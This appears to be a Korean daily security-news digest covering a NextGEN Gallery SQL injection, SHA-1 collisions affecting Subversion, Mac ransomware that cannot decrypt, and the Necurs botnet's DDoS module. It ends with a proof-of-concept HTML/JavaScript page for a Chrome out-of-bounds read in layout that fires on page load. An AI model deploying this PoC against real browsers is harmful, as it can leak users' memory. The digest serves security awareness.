일일 보안이슈
워드프레스 플러그인 NextGEN Gallery 에서 SQL 인젝션 취약점 발견
사용자가 워드프레스 웹사이트 DB의 사용자정보 등 민감한 데이터를 볼 수 있어, NextGEN 은 16.5백만 다운로드를 기록한 유명 갤러리 플러그인. 이 취약점을 발견한 Sucuri 에 따르면 NextGEN 의 기본 설정인 태그 클라우드 갤러리 기능을 이용하거나 해당 사이트의 회원이 포스트(글)을 쓸 수 있는 권한이 있다면 이 취약점에 노출될 수 있어.
기사원문
구글이 발표한 SHA-1 collision attack, 아파치 Subversion 시스템 영향받아
맥 OS용 랜섬웨어 발견…몸 값 지불해도 복구 불능
Mac 기기를 대상으로 하는 새로운 랜섬웨어 발견. 애플의 소프트웨어 개발 도구인 스위프트로 제작되었다. 이 랜섬웨어는 인기있는 소프트웨어를 크랙해 무료로 사용할 수 있게 해주는 패치 도구로 가장해 유포되고 있다. 랜섬웨어의 심각한 문제는 C&C 서버와 통신하는 코드가 없어 몸값을 지불해도 복호화가 불가능하다는 것이다.
기사원문 국문
진화하는 Necurs botnet 현재는 DDoS 모듈도 포함
Necurs는 세계에서 가장 큰 봇넷으로 확인되고, 다양한 목적으로 사용할 수 있는 모듈식 악성코드다.
현재 Necurs는 Locky 랜섬웨어를 전파하는것 뿐만 아니라 DDoS 공격 모듈도 포함되었다.
기사원문
읽을거리
Google Chrome: out-of-bound read in layout
PoC
<style>
content { contain: size layout; }
</style>
<script>
function leak() {
document.execCommand("selectAll");
opt.text = "";
}
</script>
<body onload=leak()>
<content>
<select>
<option id="opt">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</option>
</select>
</content>
